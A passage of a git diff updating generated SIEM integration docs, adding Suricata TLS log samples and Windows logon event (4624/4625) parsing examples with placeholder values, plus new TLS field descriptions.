29ea902ba..0a1affd16 100644 --- a/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md +++ b/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md @@ -41,7 +41,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "module": "powershell", "severity": 1 }, - "@timestamp": "2023-03-22T10:32:50.269000Z", + "@timestamp": "2023-03-22T10:30:37.145000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", 
@@ -98,7 +98,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "module": "dga",
 "severity": 1
 },
- "@timestamp": "2023-03-22T10:46:08.487000Z",
+ "@timestamp": "2023-03-22T10:25:54.903000Z",
 "destination": {
 "address": "pgoadcmgqfacj.com",
 "domain": "pgoadcmgqfacj.com",
@@ -158,7 +158,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "info"
 ]
 },
- "@timestamp": "2023-03-22T10:53:13.408000Z",
+ "@timestamp": "2023-03-22T10:35:22.615000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
@@ -263,7 +263,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "module": "retrohunt",
 "severity": 1
 },
- "@timestamp": "2023-06-12T10:12:39.001000Z",
+ "@timestamp": "2023-06-09T14:08:46.845000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
@@ -370,7 +370,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "module": "alert",
 "severity": 1
 },
- "@timestamp": "2023-03-22T10:44:08.001000Z",
+ "@timestamp": "2023-03-22T10:25:55.690000Z",
 "destination": {
 "address": "2.2.2.2",
 "bytes": 90364,
@@ -454,7 +454,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 ],
 "module": "fileinfo"
 },
- "@timestamp": "2023-03-22T10:44:07.998000Z",
+ "@timestamp": "2023-03-22T10:25:55.469000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
@@ -551,7 +551,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 ],
 "module": "http"
 },
- "@timestamp": "2023-03-22T10:44:07.997000Z",
+ "@timestamp": "2023-03-22T10:25:55.377000Z",
 "destination": {
 "address": "2.2.2.2",
 "ip": "2.2.2.2",
@@ -626,6 +626,71 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 ```
+=== "sigflow-tls.json"
+
+ ```json
+
+ {
+ "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "module": "tls"
+ },
+ "destination": {
+ "address": "5.6.7.8",
+ "ip": "5.6.7.8",
+ "port": 443
+ },
+ "gatewatcher": {
+ "event_type": "tls",
+ "flow_id": "1366008699485799",
+ "gcap": "gcap-xxxxxxxxx.domain.local",
+ "gcenter": "gcenter-xxxxxxxx.domain.local",
+ "timestamp_analyzed": "2024-11-21T13:02:44.291Z",
+ "tls": "{\"ja3s\": {\"hash\": \"15af977ce25de452b96affa2addb1036\", \"string\": \"771,4866,43-51\"}, \"sni\": \"www.microsoft.com\", \"version\": \"TLS 1.3\"}",
+ "tls_sni": "www.microsoft.com",
+ "type": "suricata"
+ },
+ "network": {
+ "transport": "TCP"
+ },
+ "observer": {
+ "hostname": "gcap-xxxxxxxxx.domain.local",
+ "mac": [
+ "82:df:ee:4f:81:af",
+ "e6:43:7e:91:1b:92"
+ ],
+ "name": "gcap-xxxxxxxxx.domain.local",
+ "type": "ids",
+ "version": "0.2"
+ },
+ "related": {
+ "hosts": [
+ "gcap-xxxxxxxxx.domain.local"
+ ],
+ "ip": [
+ "1.2.3.4",
+ "5.6.7.8"
+ ]
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "port": 64809
+ },
+ "tls": {
+ "server": {
+ "ja3s": "15af977ce25de452b96affa2addb1036"
+ },
+ "version": "TLS 1.3"
+ }
+ }
+
+ ```
+
+
@@ -728,7 +793,9 @@ The following table lists the fields that are extracted, normalized under the EC
 |`gatewatcher.timestamp_detected` | `keyword` | Timestamp of the file collection by gcap |
 |`gatewatcher.timestamp_package` | `text` | This field is used for retrohunt alerts |
 |`gatewatcher.tlp` | `text` | This field is used for retrohunt alerts |
-|`gatewatcher.tls` | `text` | This field represents the tls field in a network metadata (used in legacy format log) |
+|`gatewatcher.tls` | `text` | This field contains all TLS data fields in a TLS metadata |
+|`gatewatcher.tls_fingerprint` | `text` | This field represents the TLS server fingerprint field in a TLS metadata |
+|`gatewatcher.tls_sni` | `text` | This field represents the TLS SNI field in a TLS metadata |
 |`gatewatcher.ttp` | `text` | This field is used for retrohunt alerts |
 |`gatewatcher.type` | `keyword` | Type of analysis |
 |`gatewatcher.usage_mode` | `text` | This field is used for retrohunt alerts |
@@ -751,6 +818,13 @@ The following table lists the fields that are extracted, normalized under the EC
 |`source.ip` | `ip` | IP address of the source. |
 |`source.packets` | `long` | Packets sent from the source to the destination. |
 |`source.port` | `long` | Port of the source. |
+|`tls.server.certificate_chain` | `keyword` | Array of PEM-encoded certificates that make up the certificate chain offered by the server. |
+|`tls.server.issuer` | `keyword` | Subject of the issuer of the x.509 certificate presented by the server. |
+|`tls.server.ja3s` | `keyword` | A hash that identifies servers based on how they perform an SSL/TLS handshake. |
+|`tls.server.not_after` | `date` | Timestamp indicating when server certificate is no longer considered valid. |
+|`tls.server.not_before` | `date` | Timestamp indicating when server certificate is first considered valid. |
+|`tls.server.subject` | `keyword` | Subject of the x.509 certificate presented by the server. |
+|`tls.version` | `keyword` | Numeric part of the version parsed from the original string. |
 |`url.domain` | `keyword` | Domain of the url. |
 |`url.path` | `wildcard` | Path of the request, such as "/search". |
 |`user_agent.original` | `keyword` | Unparsed user_agent string. |
diff --git a/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26_sample.md b/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26_sample.md
index d5d468994..2b6773540 100644
--- a/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26_sample.md
+++ b/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26_sample.md
@@ -536,3 +536,42 @@ In this section, you will find examples of raw logs as generated natively by the
+=== "sigflow-tls"
+
+
+ ```json
+ {
+ "uuid": "b96777f9-6409-4864-b8a1-452094a93c5d",
+ "host": "gcap-xxxxxxxxx.domain.local",
+ "ether": {
+ "dest_mac": "e6:43:7e:91:1b:92",
+ "src_mac": "82:df:ee:4f:81:af"
+ },
+ "type": "suricata",
+ "dest_ip": "5.6.7.8",
+ "src_port": 64809,
+ "flow_id": 1366008699485799,
+ "timestamp_analyzed": "2024-11-21T13:02:44.291Z",
+ "timestamp": "2024-11-21T13:02:02.870913+0000",
+ "gcenter": "gcenter-xxxxxxxx.domain.local",
+ "event_type": "tls",
+ "src_ip": "1.2.3.4",
+ "dest_port": 443,
+ "in_iface": "mon2",
+ "tls": {
+ "sni": "www.microsoft.com",
+ "version": "TLS 1.3",
+ "ja3s": {
+ "string": "771,4866,43-51",
+ "hash": "15af977ce25de452b96affa2addb1036"
+ }
+ },
+ "@version": "1",
+ "proto": "TCP",
+ "gcap": "gcap-xxxxxxxxx.domain.local",
+ "@timestamp": "2024-11-21T13:02:44.291Z"
+ }
+ ```
+
+
+
diff --git a/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md b/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md
index 878f041e5..f45915948 100644
--- a/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md
+++ b/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md
@@ -1743,67 +1743,229 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "security_event_4648.json" +=== "security_event_4624.json" ```json { - "message": "{\"log\": {\"level\": \"information\"}, \"message\": \"A logon was attempted using explicit credentials.\\\\n\\\\nSubject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-2-3\\\\n\\\\tAccount Name:\\\\t\\\\tSYSTEM\\\\n\\\\tAccount Domain:\\\\t\\\\tDOMAIN\\\\n\\\\tLogon ID:\\\\t\\\\t0x41C1B034B\\\\n\\\\tLogon GUID:\\\\t\\\\t{00000000-0000-0000-0000-000000000000}\\\\n\\\\nAccount Whose Credentials Were Used:\\\\n\\\\tAccount Name:\\\\t\\\\taccount\\\\n\\\\tAccount Domain:\\\\t\\\\tcompany\\\\n\\\\tLogon GUID:\\\\t\\\\t{00000000-0000-0000-0000-000000000000}\\\\n\\\\nTarget Server:\\\\n\\\\tTarget Server Name:\\\\tTARGET.company.com\\\\n\\\\tAdditional Information:\\\\tTARGET.company.com\\\\n\\\\nProcess Information:\\\\n\\\\tProcess ID:\\\\t\\\\t0x8314\\\\n\\\\tProcess Name:\\\\t\\\\tD:\\\\\\\\Program Files (x86)\\\\\\\\Process\\\\\\\\Test\\\\\\\\processname.exe\\\\n\\\\nNetwork Information:\\\\n\\\\tNetwork Address:\\\\t8.8.8.8\\\\n\\\\tPort:\\\\t\\\\t\\\\t12345\\\\n\\\\nThis event is generated when a process attempts to log on an account by explicitly specifying that account\\\\u2019s credentials. 
This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.\", \"type\": \"R2\", \"fields\": {\"gdp-indice\": \"l-serve\", \"gdp-parc\": \"defaut\", \"gdp-config\": \"server\", \"gdp-version-sysmon\": 15, \"gdp-sousparc\": \"prod\", \"gdp-version\": \"2.8\", \"gdp-version-winlogbeat\": 3.4}, \"ecs\": {\"version\": \"8.0.0\"}, \"agent\": {\"name\": \"WB-SRV-HOST01\", \"type\": \"winlogbeat\", \"version\": \"8.8.2\", \"ephemeral_id\": \"06ad3222-a4be-4b59-9958-5f9a657ea9f1\", \"id\": \"2c0cd63b-3836-4620-9eb8-13202bd370a3\"}, \"fields.gdp-redis\": \"2\", \"event\": {\"provider\": \"Microsoft-Windows-Security-Auditing\", \"kind\": \"event\", \"code\": \"4648\", \"action\": \"Logon\", \"created\": \"2023-11-09T09:05:15.197Z\", \"outcome\": \"success\"}, \"winlog\": {\"event_id\": \"4648\", \"keywords\": [\"Audit Success\"], \"provider_guid\": \"{54849625-5478-4994-A5BA-3E3B0328C30D}\", \"event_data\": {\"SubjectUserName\": \"SYSTEM\", \"IpPort\": \"12345\", \"TargetInfo\": \"TARGET.company.com\", \"TargetLogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"TargetUserName\": \"account\", \"TargetServerName\": \"TARGET.company.com\", \"ProcessName\": \"D:\\\\\\\\Program Files (x86)\\\\\\\\Process\\\\\\\\Test\\\\\\\\processname.exe\", \"SubjectUserSid\": \"S-1-2-3\", \"IpAddress\": \"8.8.8.8\", \"TargetDomainName\": \"company\", \"SubjectDomainName\": \"DOMAIN\", \"ProcessId\": \"0x8314\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"SubjectLogonId\": \"0x41c1b034b\"}, \"process\": {\"pid\": 848, \"thread\": {\"id\": 22916}}, \"provider_name\": \"Microsoft-Windows-Security-Auditing\", \"computer_name\": \"HOST01.company.com\", \"opcode\": \"Info\", \"task\": \"Logon\", \"channel\": \"Security\", \"api\": \"wineventlog\", \"record_id\": 8500947825, \"activity_id\": \"{7E156DC4-0D77-0008-C56D-157E770DDA01}\"}, \"@timestamp\": \"2023-11-09T09:05:14.415Z\", \"host\": {\"name\": \"HOST01\", \"id\": 
\"abcdefgh-1234-5678-abcd-efgh12345678\", \"mac\": [\"00-00-00-00-00-00-00-E0\", \"00-11-22-33-44-55\"], \"architecture\": \"x86_64\", \"os\": {\"platform\": \"windows\", \"version\": \"10.0\", \"name\": \"Windows Server 2016 Standard\", \"build\": \"14393.6351\", \"kernel\": \"10.0.14393.6343 (rs1_release.230913-1727)\", \"type\": \"windows\", \"family\": \"windows\"}, \"hostname\": \"HOST01\", \"ip\": [\"1.2.3.4\", \"fe80::abcd:123:456\"]}, \"event_ingest_logstash\": \"2023-11-09T09:05:14.912238Z\", \"fields.gdp-logstash\": \"5\", \"@version\": \"1\"}", + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", "event": { - "action": "Logon", - "code": "4648", + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", "kind": "event", "module": "security", - "original": "A logon was attempted using explicit credentials.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tSYSTEM\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x41C1B034B\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nAccount Whose Credentials Were Used:\\n\\tAccount Name:\\t\\taccount\\n\\tAccount Domain:\\t\\tcompany\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nTarget Server:\\n\\tTarget Server Name:\\tTARGET.company.com\\n\\tAdditional Information:\\tTARGET.company.com\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x8314\\n\\tProcess Name:\\t\\tD:\\\\Program Files (x86)\\\\Process\\\\Test\\\\processname.exe\\n\\nNetwork Information:\\n\\tNetwork Address:\\t8.8.8.8\\n\\tPort:\\t\\t\\t12345\\n\\nThis event is generated when a process attempts to log on an account by explicitly specifying that account\\u2019s credentials. 
This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.", - "outcome": "success", - "provider": "Microsoft-Windows-Security-Auditing" + "original": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "type": [ + "start" + ] }, - "@timestamp": "2023-11-09T09:05:14.415000Z", + "@timestamp": "2024-11-12T08:41:05.803000Z", "action": { - "id": 4648, + "id": 4624, "outcome": "success", "properties": { - "IpAddress": "8.8.8.8", - "IpPort": "12345", + "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "IpAddress": "1.2.3.4", + "IpPort": "29051", + "KeyLength": "0", + "LmPackageName": "-", "LogonGuid": "{00000000-0000-0000-0000-000000000000}", - "ProcessId": "0x8314", - "ProcessName": "D:\\\\Program Files (x86)\\\\Process\\\\Test\\\\processname.exe", + "LogonProcessName": "Process ", + "LogonType": "3", + "ProcessId": "0x2f0", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "RestrictedAdminMode": "-", "SubjectDomainName": "DOMAIN", - "SubjectLogonId": "0x41c1b034b", - "SubjectUserName": "SYSTEM", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WS-USER-01$", "SubjectUserSid": "S-1-2-3", - "TargetDomainName": "company", - "TargetInfo": "TARGET.company.com", - "TargetLogonGuid": "{00000000-0000-0000-0000-000000000000}", - "TargetServerName": "TARGET.company.com", - "TargetUserName": "account" + "TargetDomainName": "DOMAIN", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0xfcebb74a", + 
"TargetOutboundDomainName": "-", + "TargetOutboundUserName": "-", + "TargetUserName": "target_user", + "TargetUserSid": "S-4-5-6", + "TransmittedServices": "-", + "VirtualAccount": "%%1843", + "WorkstationName": "WS-USER-01" } }, "agent": { - "ephemeral_id": "06ad3222-a4be-4b59-9958-5f9a657ea9f1", - "id": "2c0cd63b-3836-4620-9eb8-13202bd370a3", - "name": "WB-SRV-HOST01", + "ephemeral_id": "12345678-1234-5678-9012-123456789012", + "id": "abcd1234-abcd-1234-ef56-abcdef123456", "type": "winlogbeat", - "version": "8.8.2" + "version": "7.0.0" + }, + "client": { + "ip": "1.2.3.4" }, "host": { "architecture": "x86_64", - "hostname": "HOST01", - "id": "abcdefgh-1234-5678-abcd-efgh12345678", + "hostname": "hostname", + "id": "abcdefab-1234-5678-9012-abcdefabcdef", + "name": "hostname", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Datacenter", + "platform": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Process " + } + }, + "client": { + "name": "WS-USER-01", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "user": { + "id": "S-1-2-3", + "name": "WS-USER-01$", + "target": { + "domain": "DOMAIN", + "id": "S-4-5-6", + "name": "target_user" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.company.com", + "event_id": "4624", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 752, + "thread": { + "id": 7960 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1170100815", + "task": "Logon", + "version": 2 + } + } + + ``` + + +=== 
"security_event_4625.json" + + ```json + + { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"nam
e\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4625", + "kind": "event", + "module": "security", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing", + "reason": "user_not_exist", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:40:34.260000Z", + "action": { + "id": 4625, + "outcome": "failure", + "properties": { + "AuthenticationPackageName": "Kerberos", + "FailureReason": "%%2313", + "IpAddress": "-", + "IpPort": "-", + "KeyLength": "0", + "LmPackageName": "-", + "LogonProcessName": "Channel", + "LogonType": "3", + "ProcessId": "0x338", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "Status": "0xc000006d", + "SubStatus": "0xc0000064", + "SubjectDomainName": "J_DOE", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WORKSTATION$", + "SubjectUserSid": "S-1-2-3", + "TargetUserSid": "S-1-0-0", + "TransmittedServices": "-", + "WorkstationName": "WORKSTATION" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "WORKSTATION", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", "ip": [ "1.2.3.4", - "fe80::abcd:123:456" + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + 
